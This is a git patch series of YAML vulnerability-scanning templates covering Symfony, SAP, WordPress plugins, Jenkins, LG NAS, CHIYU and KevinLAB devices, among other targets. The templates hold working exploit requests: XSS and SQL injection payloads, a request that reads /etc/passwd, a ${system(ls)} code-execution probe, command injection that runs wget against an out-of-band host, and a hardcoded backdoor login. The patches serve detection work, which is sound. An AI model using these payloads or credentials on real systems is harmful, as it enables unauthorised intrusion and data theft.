default-logins/ibm/ibm-storage-default-credential.yaml index 3de1643ded..05ebbcc3c5 100644 --- a/default-logins/ibm/IBM-Default-Creds.yaml +++ b/default-logins/ibm/ibm-storage-default-credential.yaml @@ -1,9 +1,10 @@ -id: IBM-Default-Creds +id: ibm-storage-default-credential info: name: IBM Storage Management default creds author: madrobot severity: medium + tags: default-login,ibm requests: - raw: @@ -24,10 +25,12 @@ requests: - "/0/Console" - "Property of IBM" condition: and + part: body - type: word words: - "JSESSIONID" + part: header - type: status status: From 1b437d300a9f0658b07ea2196dcecc004898e466 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 26 Jul 2021 17:21:46 +0530 Subject: [PATCH 1156/4083] Additional matcher for Symfony debug mode --- misconfiguration/symfony-debugmode.yaml | 19 +++++++++++-------- 1 file changed, 11 insertions(+), 8 deletions(-) diff --git a/misconfiguration/symfony-debugmode.yaml b/misconfiguration/symfony-debugmode.yaml index 797ce4a4e0..e9dae3427f 100644 --- a/misconfiguration/symfony-debugmode.yaml +++ b/misconfiguration/symfony-debugmode.yaml @@ -1,7 +1,8 @@ id: symfony-debugmode + info: name: Symfony Debug Mode - author: organiccrap + author: organiccrap,pdteam severity: high description: The remote Symfony installations appears to have left the 'debug' interface enabled, allowing the disclosure and possible execution of arbitrary code. reference: https://github.com/synacktiv/eos @@ -11,16 +12,18 @@ requests: - method: GET path: - '{{BaseURL}}' - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 - matchers-condition: and + + matchers-condition: or matchers: - - type: status - status: - - 200 + - type: word words: - 'X-Debug-Token-Link:' - - /_profiler/ + - '/_profiler/' part: header condition: and + + - type: word + words: + - 'debug mode is enabled.' + part: body \ No newline at end of file From dbace50bdb534cdbc4aa94fb06731921386bf3b2 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 26 Jul 2021 18:03:07 +0530 Subject: [PATCH 1157/4083] Update CVE-2016-1000140.yaml --- cves/2016/CVE-2016-1000140.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2016/CVE-2016-1000140.yaml b/cves/2016/CVE-2016-1000140.yaml index c44f2dd638..8f25cbc37c 100644 --- a/cves/2016/CVE-2016-1000140.yaml +++ b/cves/2016/CVE-2016-1000140.yaml @@ -10,13 +10,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/new-year-firework/firework/index.php?text=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E%3C%22" + - "{{BaseURL}}/wp-content/plugins/new-year-firework/firework/index.php?text=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 8130cd2c3b1c319bcb24bdc6e55f9188406aa0bb Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Mon, 26 Jul 2021 18:26:19 +0530 Subject: [PATCH 1158/4083] Update CVE-2020-6207.yaml --- cves/2020/CVE-2020-6207.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-6207.yaml b/cves/2020/CVE-2020-6207.yaml index 55a9f04a6f..d36d906517 100644 --- a/cves/2020/CVE-2020-6207.yaml +++ b/cves/2020/CVE-2020-6207.yaml @@ -4,7 +4,7 @@ info: name: SAP Solution Manager remote unauthorized OS commands execution author: _generic_human_ severity: critical - tags: cve,sap,solman,rce + tags: cve,cve2020,sap,solman,rce description: | SAP Solution Manager (SolMan) running version 7.2 has CVE-2020-6207 vulnerability within the SAP EEM servlet (tc~smd~agent~application~eem). The vulnerability occurs due to missing authentication checks when submitting SOAP requests to the /EemAdminService/EemAdmin page to get information about connected SMDAgents, send HTTP request (SSRF), and execute OS commands on connected SMDAgent. reference: From a525e8c80a6678d3044376287253c4eca5a82430 Mon Sep 17 00:00:00 2001 From: meme-lord <17912559+meme-lord@users.noreply.github.com> Date: Mon, 26 Jul 2021 18:10:23 +0100 Subject: [PATCH 1159/4083] Added Prestashop module fuzz template --- fuzzing/prestashop-module-fuzz.yaml | 35 ++ helpers/wordlists/prestashop-modules.txt | 639 +++++++++++++++++++++++ 2 files changed, 674 insertions(+) create mode 100644 fuzzing/prestashop-module-fuzz.yaml create mode 100644 helpers/wordlists/prestashop-modules.txt diff --git a/fuzzing/prestashop-module-fuzz.yaml b/fuzzing/prestashop-module-fuzz.yaml new file mode 100644 index 0000000000..4ea4775c8a --- /dev/null +++ b/fuzzing/prestashop-module-fuzz.yaml @@ -0,0 +1,35 @@ +id: prestashop-module-fuzz +info: + name: Prestashop Modules Fuzz + author: meme-lord + severity: info + tags: fuzz,prestashop + +requests: + + - payloads: + path: helpers/wordlists/prestashop-modules.txt + + attack: sniper + threads: 50 + + raw: + - | + GET /modules/{{path}}/config.xml HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/plain, */* + Accept-Language: en-US,en;q=0.5 + Referer: {{BaseURL}} + + matchers-condition: and + matchers: + - type: word + words: + - "" + + extractors: + - type: regex + part: body + group: 2 + regex: + - '( Date: Mon, 26 Jul 2021 22:48:45 +0530 Subject: [PATCH 1160/4083] More CVEs Template --- cves/2014/CVE-2014-2323.yaml | 21 +++++++++++++++++++++ cves/2016/CVE-2016-0957.yaml | 28 ++++++++++++++++++++++++++++ cves/2018/CVE-2018-1000600.yaml | 22 ++++++++++++++++++++++ cves/2020/CVE-2020-24949.yaml | 26 ++++++++++++++++++++++++++ cves/2020/CVE-2020-9402.yaml | 26 ++++++++++++++++++++++++++ cves/2021/CVE-2021-24291.yaml | 31 +++++++++++++++++++++++++++++++ cves/2021/CVE-2021-31249.yaml | 26 ++++++++++++++++++++++++++ cves/2021/CVE-2021-31250.yaml | 28 ++++++++++++++++++++++++++++ cves/2021/CVE-2021-31581.yaml | 27 +++++++++++++++++++++++++++ cves/2021/CVE-2021-33221.yaml | 32 ++++++++++++++++++++++++++++++++ cves/2021/CVE-2021-3377.yaml | 29 +++++++++++++++++++++++++++++ cves/2021/CVE-2021-33904.yaml | 31 +++++++++++++++++++++++++++++++ 12 files changed, 327 insertions(+) create mode 100644 cves/2014/CVE-2014-2323.yaml create mode 100644 cves/2016/CVE-2016-0957.yaml create mode 100644 cves/2018/CVE-2018-1000600.yaml create mode 100644 cves/2020/CVE-2020-24949.yaml create mode 100644 cves/2020/CVE-2020-9402.yaml create mode 100644 cves/2021/CVE-2021-24291.yaml create mode 100644 cves/2021/CVE-2021-31249.yaml create mode 100644 cves/2021/CVE-2021-31250.yaml create mode 100644 cves/2021/CVE-2021-31581.yaml create mode 100644 cves/2021/CVE-2021-33221.yaml create mode 100644 cves/2021/CVE-2021-3377.yaml create mode 100644 cves/2021/CVE-2021-33904.yaml diff --git a/cves/2014/CVE-2014-2323.yaml b/cves/2014/CVE-2014-2323.yaml new file mode 100644 index 0000000000..e4dff03126 --- /dev/null +++ b/cves/2014/CVE-2014-2323.yaml @@ -0,0 +1,21 @@ +id: CVE-2014-2323 + +info: + name: Lighttpd 1.4.34 SQL injection and path traversal + description: SQL injection vulnerability in mod_mysql_vhost.c in lighttpd before 1.4.35 allows remote attackers to execute arbitrary SQL commands via the host name, related to request_check_hostname. + reference: https://download.lighttpd.net/lighttpd/security/lighttpd_sa_2014_01.txt + author: geeknik + severity: critical + tags: cve,cve2014,sqli,lighttpd + +requests: + - raw: + - |+ + GET /etc/passwd HTTP/1.1 + Host: [::1]' UNION SELECT '/ + + unsafe: true + matchers: + - type: regex + regex: + - "root:[x*]:0:0:" diff --git a/cves/2016/CVE-2016-0957.yaml b/cves/2016/CVE-2016-0957.yaml new file mode 100644 index 0000000000..8dc7b5b7e6 --- /dev/null +++ b/cves/2016/CVE-2016-0957.yaml @@ -0,0 +1,28 @@ +id: CVE-2016-0957 + +info: + name: Adobe AEM Console Disclosure + author: geeknik + description: Dispatcher before 4.1.5 in Adobe Experience Manager 5.6.1, 6.0.0, and 6.1.0 does not properly implement a URL filter, which allows remote attackers to bypass dispatcher rules via unspecified vectors. + reference: https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html + severity: high + tags: cve,cve2016,adobe,aem + +requests: + - method: GET + path: + - "{{BaseURL}}/system/console?.css" + header: + - Authorization: "Basic YWRtaW46YWRtaW4K" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "Adobe" + - "java.lang" + - "(Runtime)" + condition: and diff --git a/cves/2018/CVE-2018-1000600.yaml b/cves/2018/CVE-2018-1000600.yaml new file mode 100644 index 0000000000..5b5e68d0d7 --- /dev/null +++ b/cves/2018/CVE-2018-1000600.yaml @@ -0,0 +1,22 @@ +id: CVE-2018-1000600 + +info: + name: Pre-auth Fully-responded SSRF + description: A exposure of sensitive information vulnerability exists in Jenkins GitHub Plugin 1.29.1 and earlier in GitHubTokenCredentialsCreator.java that allows attackers to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins. + reference: + - https://www.jenkins.io/security/advisory/2018-06-25/#SECURITY-915 + - https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/ + author: geeknik + severity: medium + tags: cve,cve2018,jenkins,ssrf,oob + +requests: + - method: GET + path: + - "{{BaseURL}}/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://{{interactsh-url}}" + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" \ No newline at end of file diff --git a/cves/2020/CVE-2020-24949.yaml b/cves/2020/CVE-2020-24949.yaml new file mode 100644 index 0000000000..9b973fef67 --- /dev/null +++ b/cves/2020/CVE-2020-24949.yaml @@ -0,0 +1,26 @@ +id: CVE-2020-24949 + +info: + name: PHPFusion 9.03.50 Remote Code Execution + author: geeknik + severity: high + description: Privilege escalation in PHP-Fusion 9.03.50 downloads/downloads.php allows an authenticated user (not admin) to send a crafted request to the server and perform remote command execution (RCE). + reference: https://packetstormsecurity.com/files/162852/phpfusion90350-exec.txt + tags: cve,cve2020,phpfusion,rce,php + +requests: + - method: GET + path: + - "{{BaseURL}}/infusions/downloads/downloads.php?cat_id=${system(ls)}" + + matchers-condition: and + matchers: + + - type: status + status: + - 200 + + - type: word + part: body + words: + - "infusion_db.php" \ No newline at end of file diff --git a/cves/2020/CVE-2020-9402.yaml b/cves/2020/CVE-2020-9402.yaml new file mode 100644 index 0000000000..fce8b70603 --- /dev/null +++ b/cves/2020/CVE-2020-9402.yaml @@ -0,0 +1,26 @@ +id: CVE-2020-9402 + +info: + name: Django SQL Injection + description: Django 1.11 before 1.11.29, 2.2 before 2.2.11, and 3.0 before 3.0.4 allows SQL Injection if untrusted data is used as a tolerance parameter in GIS functions and aggregates on Oracle. By passing a suitably crafted tolerance to GIS functions and aggregates on Oracle, it was possible to break escaping and inject malicious SQL. + reference: | + - https://github.com/vulhub/vulhub/tree/master/django/CVE-2020-9402 + - https://docs.djangoproject.com/en/3.0/releases/security/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-9402 + author: geeknik + severity: high + tags: cve,cve2020,django,sqli + +requests: + - method: GET + path: + - "{{BaseURL}}/?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1" + + matchers: + - type: word + words: + - "DatabaseError at" + - "ORA-29257:" + - "ORA-06512:" + - "Request Method:" + condition: and diff --git a/cves/2021/CVE-2021-24291.yaml b/cves/2021/CVE-2021-24291.yaml new file mode 100644 index 0000000000..3d7e73cfbc --- /dev/null +++ b/cves/2021/CVE-2021-24291.yaml @@ -0,0 +1,31 @@ +id: CVE-2021-24291 + +info: + name: Photo Gallery < 1.5.69 - Multiple Reflected Cross-Site Scripting (XSS) + author: geeknik + description: The plugin was vulnerable to Reflected Cross-Site Scripting (XSS) issues via the gallery_id, tag, album_id and theme_id GET parameters passed to the bwg_frontend_data AJAX action (available to both unauthenticated and authenticated users) + reference: https://wpscan.com/vulnerability/cfb982b2-8b6d-4345-b3ab-3d2b130b873a + severity: medium + tags: cve,cve2021,xss,wordpress,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1"%20onmouseover=alert(document.domain)//' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + words: + - "text/html" + + - type: word + words: + - "onmouseover=alert(document.domain)//" + - "wp-content/uploads/photo-gallery" + condition: and diff --git a/cves/2021/CVE-2021-31249.yaml b/cves/2021/CVE-2021-31249.yaml new file mode 100644 index 0000000000..64112f9e82 --- /dev/null +++ b/cves/2021/CVE-2021-31249.yaml @@ -0,0 +1,26 @@ +id: CVE-2021-31249 + +info: + name: CHIYU TCP/IP Converter devices - CRLF injection + author: geeknik + description: A CRLF injection vulnerability was found on BF-430, BF-431, and BF-450M TCP/IP Converter devices from CHIYU Technology Inc due to a lack of validation on the parameter 'redirect' available on multiple CGI components. + reference: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31249 + severity: medium + tags: cve,cve2021,chiyu,crlf,iot + +requests: + - method: GET + path: + - "{{BaseURL}}/man.cgi?redirect=setting.htm%0d%0a%0d%0a&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY" + + matchers-condition: and + matchers: + - type: status + status: + - 302 + - type: word + part: header + words: + - "Location: setting.htm" + - "" + condition: and diff --git a/cves/2021/CVE-2021-31250.yaml b/cves/2021/CVE-2021-31250.yaml new file mode 100644 index 0000000000..f03536d032 --- /dev/null +++ b/cves/2021/CVE-2021-31250.yaml @@ -0,0 +1,28 @@ +id: CVE-2021-31250 + +info: + name: CHIYU IoT XSS + author: geeknik + description: Several versions and models of CHIYU IoT devices are vulnerable to multiple Cross-Site Scripting flaws. + reference: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31250 + severity: medium + tags: cve,cve2021,chiyu,xss,iot + +requests: + - method: GET + path: + - "{{BaseURL}}/if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28{{randstr}}%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY" + headers: + Authorization: "Basic OmFkbWlu" + + redirects: true + matchers-condition: and + matchers: + - type: word + part: header + words: + - "text/html" + - type: word + part: body + words: + - "\">" diff --git a/cves/2021/CVE-2021-31581.yaml b/cves/2021/CVE-2021-31581.yaml new file mode 100644 index 0000000000..d1ae4aeb7e --- /dev/null +++ b/cves/2021/CVE-2021-31581.yaml @@ -0,0 +1,27 @@ +id: CVE-2021-31581 + +info: + name: Akkadian Provisioning Manager MariaDB Credentials + author: geeknik + reference: + - https://threatpost.com/unpatched-bugs-provisioning-cisco-uc/166882/ + - https://www.rapid7.com/blog/post/2021/06/08/akkadian-provisioning-manager-multiple-vulnerabilities-disclosure/ + severity: medium + tags: cve,cve2021,akkadian,mariadb,disclosure + +requests: + - method: GET + path: + - "{{BaseURL}}/pme/database/pme/phinx.yml" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "host:" + - "name:" + - "pass:" + condition: and diff --git a/cves/2021/CVE-2021-33221.yaml b/cves/2021/CVE-2021-33221.yaml new file mode 100644 index 0000000000..0426b0eee2 --- /dev/null +++ b/cves/2021/CVE-2021-33221.yaml @@ -0,0 +1,32 @@ +id: CVE-2021-33221 + +info: + name: CommScope Ruckus IoT Controller Unauthenticated Service Details + author: geeknik + description: A 'service details' API endpoint discloses system and configuration information to an attacker without requiring authentication. This information includes DNS and NTP servers that the devices uses for time and host resolution. It also includes the internal hostname and IoT Controller version. A fully configured device in production may leak other, more sensitive information (API keys and tokens). + reference: https://www.commscope.com/globalassets/digizuite/917216-faq-security-advisory-id-20210525-v1-0.pdf + severity: medium + tags: cve,cve2021,commscope,ruckus,debug + +requests: + - method: GET + path: + - "{{BaseURL}}/service/v1/service-details" + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "application/json" + - type: word + words: + - "message" + - "ok" + - "data" + - "dns" + - "gateway" + condition: and + - type: status + status: + - 200 diff --git a/cves/2021/CVE-2021-3377.yaml b/cves/2021/CVE-2021-3377.yaml new file mode 100644 index 0000000000..74213022a3 --- /dev/null +++ b/cves/2021/CVE-2021-3377.yaml @@ -0,0 +1,29 @@ +id: CVE-2021-3377 + +info: + name: Ansi_up XSS + description: The npm package ansi_up converts ANSI escape codes into HTML. In ansi_up v4, ANSI escape codes can be used to create HTML hyperlinks. Due to insufficient URL sanitization, this feature is affected by a cross-site scripting (XSS) vulnerability. This issue is fixed in v5.0.0. + reference: | + - https://doyensec.com/resources/Doyensec_Advisory_ansi_up4_XSS.pdf + - https://github.com/drudru/ansi_up/commit/c8c726ed1db979bae4f257b7fa41775155ba2e27 + author: geeknik + severity: medium + +requests: + - raw: + - |+ + GET /\u001B]8;;https://example.com"/onmouseover="alert(1)\u0007example\u001B]8;;\u0007 HTTP/1.1 + Host: {{Hostname}} + Connection: close + + unsafe: true + matchers-condition: and + matchers: + - type: word + part: header + words: + - "text/html" + + - type: word + words: + - "com\"/onmouseover=\"alert(1)\">" \ No newline at end of file diff --git a/cves/2021/CVE-2021-33904.yaml b/cves/2021/CVE-2021-33904.yaml new file mode 100644 index 0000000000..cdb7130cd7 --- /dev/null +++ b/cves/2021/CVE-2021-33904.yaml @@ -0,0 +1,31 @@ +id: CVE-2021-33904 + +info: + name: Accela Civic Platform 21.1 - 'servProvCode' XSS + author: geeknik + description: In Accela Civic Platform through 21.1, the security/hostSignon.do parameter servProvCode is vulnerable to XSS. + reference: https://www.exploit-db.com/exploits/49980 + severity: medium + tags: cve,cve2021,accela,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(document.domain)%5e%22a2pbrnzx5a9" + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "text/html" + + - type: word + words: + - '"k3woq"^confirm(document.domain)^"a2pbrnzx5a9"' + - 'servProvCode' + condition: and + + - type: status + status: + - 200 \ No newline at end of file From 4029278d6c01a96588e84a016a07cc34e2225b61 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Tue, 27 Jul 2021 02:27:13 +0900 Subject: [PATCH 1161/4083] Create CVE-2018-10818.yaml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices. You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the “password” parameter. Signed-off-by: GwanYeong Kim --- cves/2018/CVE-2018-10818.yaml | 42 +++++++++++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 cves/2018/CVE-2018-10818.yaml diff --git a/cves/2018/CVE-2018-10818.yaml b/cves/2018/CVE-2018-10818.yaml new file mode 100644 index 0000000000..d4bd7cea24 --- /dev/null +++ b/cves/2018/CVE-2018-10818.yaml @@ -0,0 +1,42 @@ +id: CVE-2018–10818 + +info: + name: LG NAS Devices - Remote Code Execution (Unauthenticated) + author: gy741 + severity: critical + description: The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices. You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the “password” parameter. + reference: | + - https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/ + - https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247 + tags: cve,cve2018,lg-nas,rce + +requests: + - raw: + - | + POST /system/sharedir.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: curl/7.58.0 + Accept: */* + Content-Type: application/x-www-form-urlencoded + + &uid=10; wget http://{{interactsh-url}} + + - | + POST /en/php/usb_sync.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: curl/7.58.0 + Accept: */* + Content-Type: application/x-www-form-urlencoded + + &act=sync&task_number=1;wget http://{{interactsh-url}} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + + - type: status + status: + - 200 From eadc9b4dac47a0037a4c703ec64dbb5acffec752 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Tue, 27 Jul 2021 02:48:31 +0900 Subject: [PATCH 1162/4083] Create kevinlab-hems-backdoor.yaml The HEMS solution has an undocumented backdoor account and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution thru the RMI. Attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the HEMS is offering remotely. Signed-off-by: GwanYeong Kim --- .../other/kevinlab-hems-backdoor.yaml | 36 +++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 vulnerabilities/other/kevinlab-hems-backdoor.yaml diff --git a/vulnerabilities/other/kevinlab-hems-backdoor.yaml b/vulnerabilities/other/kevinlab-hems-backdoor.yaml new file mode 100644 index 0000000000..d21e3cacdc --- /dev/null +++ b/vulnerabilities/other/kevinlab-hems-backdoor.yaml @@ -0,0 +1,36 @@ +id: kevinlab-hems-backdoor + +info: + name: KevinLAB HEMS Undocumented Backdoor Account + author: gy741 + severity: critical + description: The HEMS solution has an undocumented backdoor account and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution thru the RMI. Attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the HEMS is offering remotely. + reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5654.php + tags: kevinlab + +requests: + - raw: + - | + POST /dashboard/proc.php?type=login HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/javascript, */*; q=0.01 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + Accept-Encoding: gzip, deflate + Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 + Connection: close + + userid=kevinlab&userpass=kevin003 + + matchers-condition: and + req-condition: true + matchers: + - type: dsl + dsl: + - "!contains(body_1, 'alert')" + - "contains(body_1, 'meta http-equiv')" + condition: and + + - type: status + status: + - 200 From 354d0d64ed5e7cf868065187b5f89ea53f334d4e Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 26 Jul 2021 23:19:41 +0530 Subject: [PATCH 1163/4083] Update templates-stats.yml --- .github/workflows/templates-stats.yml | 8 -------- 1 file changed, 8 deletions(-) diff --git a/.github/workflows/templates-stats.yml b/.github/workflows/templates-stats.yml index a701cd34d1..b470648a42 100644 --- a/.github/workflows/templates-stats.yml +++ b/.github/workflows/templates-stats.yml @@ -20,15 +20,7 @@ jobs: with: go-version: 1.14 - - name: Cache Go - id: cache-go - uses: actions/cache@v2 - with: - path: /home/runner/go - key: ${{ runner.os }}-go - - name: Installing Template Stats - if: steps.cache-go.outputs.cache-hit != 'true' env: GO111MODULE: on run: | From 9d20f70fa542ee05fa7ffaa0977df776cb6e2742 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 26 Jul 2021 17:50:18 +0000 Subject: [PATCH 1164/4083] Auto Generated Templates Stats [Mon Jul 26 17:50:18 UTC 2021] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 603 +------------------------------------------ TOP-10.md | 14 +- 3 files changed, 5 insertions(+), 614 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 89fb334609..0967ef424b 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":464},{"name":"panel","count":201},{"name":"xss","count":168},{"name":"wordpress","count":165},{"name":"rce","count":162},{"name":"exposure","count":154},{"name":"cve2020","count":135},{"name":"lfi","count":127},{"name":"wp-plugin","count":110},{"name":"cve2019","count":82},{"name":"config","count":81},{"name":"tech","count":72},{"name":"cve2021","count":71},{"name":"takeover","count":71},{"name":"token","count":63},{"name":"cve2018","count":62},{"name":"apache","count":60},{"name":"default-login","count":45},{"name":"cve2017","count":43},{"name":"file","count":42},{"name":"unauth","count":39},{"name":"iot","count":33},{"name":"network","count":32},{"name":"oracle","count":29},{"name":"sqli","count":29},{"name":"workflow","count":28},{"name":"misc","count":27},{"name":"atlassian","count":26},{"name":"jira","count":25},{"name":"oob","count":25},{"name":"ssrf","count":25},{"name":"disclosure","count":24},{"name":"logs","count":24},{"name":"redirect","count":20},{"name":"aem","count":18},{"name":"listing","count":15},{"name":"cisco","count":15},{"name":"sap","count":14},{"name":"cve2016","count":14},{"name":"fuzz","count":13},{"name":"debug","count":13},{"name":"struts","count":13},{"name":"cve2015","count":13},{"name":"misconfig","count":13},{"name":"weblogic","count":12},{"name":"android","count":12},{"name":"springboot","count":11},{"name":"dns","count":11},{"name":"zoho","count":11},{"name":"auth-bypass","count":11},{"name":"devops","count":10},{"name":"cve2011","count":10},{"name":"magento","count":9},{"name":"cve2012","count":9},{"name":"dlink","count":9},{"name":"jenkins","count":9},{"name":"ftp","count":8},{"name":"gitlab","count":8},{"name":"airflow","count":8},{"name":"cve2013","count":8},{"name":"adobe","count":8},{"name":"cnvd","count":8},{"name":"php","count":8},{"name":"aws","count":8},{"name":"joomla","count":7},{"name":"scada","count":7},{"name":"vmware","count":7},{"name":"cve2014","count":7},{"name":"rconfig","count":6},{"name":"backup","count":6},{"name":"api","count":6},{"name":"nginx","count":6},{"name":"cms","count":6},{"name":"citrix","count":6},{"name":"google","count":6},{"name":"rails","count":6},{"name":"xxe","count":6},{"name":"login","count":5},{"name":"laravel","count":5},{"name":"confluence","count":5},{"name":"solr","count":5},{"name":"dell","count":5},{"name":"java","count":5},{"name":"circarlife","count":5},{"name":"iis","count":5},{"name":"ssti","count":5},{"name":"lucee","count":5},{"name":"phpmyadmin","count":5},{"name":"ruijie","count":5},{"name":"headless","count":5},{"name":"drupal","count":5},{"name":"jetty","count":5},{"name":"solarwinds","count":4},{"name":"samsung","count":4},{"name":"hongdian","count":4},{"name":"docker","count":4},{"name":"cve2009","count":4},{"name":"artifactory","count":4},{"name":"thinkcmf","count":4},{"name":"traversal","count":4},{"name":"thinkphp","count":4},{"name":"nodejs","count":4},{"name":"router","count":4},{"name":"vpn","count":4},{"name":"asp","count":4},{"name":"django","count":4},{"name":"magmi","count":4},{"name":"webserver","count":4},{"name":"tomcat","count":4},{"name":"elastic","count":4},{"name":"moodle","count":4},{"name":"netgear","count":4},{"name":"jolokia","count":4},{"name":"ibm","count":4},{"name":"fileupload","count":4},{"name":"terramaster","count":3},{"name":"bypass","count":3},{"name":"git","count":3},{"name":"ofbiz","count":3},{"name":"fanruan","count":3},{"name":"printer","count":3},{"name":"lfr","count":3},{"name":"grafana","count":3},{"name":"r-seenet","count":3},{"name":"nacos","count":3},{"name":"fpd","count":3},{"name":"backups","count":3},{"name":"openssh","count":3},{"name":"springcloud","count":3},{"name":"amazon","count":3},{"name":"microstrategy","count":3},{"name":"vbulletin","count":3},{"name":"slack","count":3},{"name":"ebs","count":3},{"name":"dedecms","count":3},{"name":"caucho","count":3},{"name":"kubernetes","count":3},{"name":"mongodb","count":3},{"name":"deserialization","count":3},{"name":"resin","count":3},{"name":"ssh","count":3},{"name":"windows","count":3},{"name":"kafka","count":3},{"name":"log","count":3},{"name":"nosqli","count":3},{"name":"crlf","count":3},{"name":"oa","count":3},{"name":"microsoft","count":2},{"name":"rockmongo","count":2},{"name":"cache","count":2},{"name":"intrusive","count":2},{"name":"globalprotect","count":2},{"name":"jboss","count":2},{"name":"openam","count":2},{"name":"openfire","count":2},{"name":"mail","count":2},{"name":"exposures","count":2},{"name":"pega","count":2},{"name":"fortios","count":2},{"name":"keycloak","count":2},{"name":"proxy","count":2},{"name":"oauth","count":2},{"name":"plesk","count":2},{"name":"xxljob","count":2},{"name":"rockethchat","count":2},{"name":"vrealize","count":2},{"name":"splunk","count":2},{"name":"waf","count":2},{"name":"frp","count":2},{"name":"ucmdb","count":2},{"name":"seeyon","count":2},{"name":"prometheus","count":2},{"name":"webcam","count":2},{"name":"spark","count":2},{"name":"injection","count":2},{"name":"emerge","count":2},{"name":"paloalto","count":2},{"name":"hpe","count":2},{"name":"kentico","count":2},{"name":"rstudio","count":2},{"name":"flir","count":2},{"name":"bigip","count":2},{"name":"natshell","count":2},{"name":"ecology","count":2},{"name":"activemq","count":2},{"name":"hp","count":2},{"name":"nagios","count":2},{"name":"icewarp","count":2},{"name":"maian","count":2},{"name":"coldfusion","count":2},{"name":"smtp","count":2},{"name":"dos","count":2},{"name":"nexus","count":2},{"name":"saltstack","count":2},{"name":"smb","count":2},{"name":"couchdb","count":2},{"name":"odoo","count":2},{"name":"zabbix","count":2},{"name":"httpd","count":2},{"name":"kibana","count":2},{"name":"idrac","count":2},{"name":"leak","count":2},{"name":"telerik","count":2},{"name":"glassfish","count":2},{"name":"strapi","count":2},{"name":"nextjs","count":2},{"name":"sonarqube","count":2},{"name":"sonicwall","count":2},{"name":"voipmonitor","count":2},{"name":"sharepoint","count":2},{"name":"wordfence","count":2},{"name":"zhiyuan","count":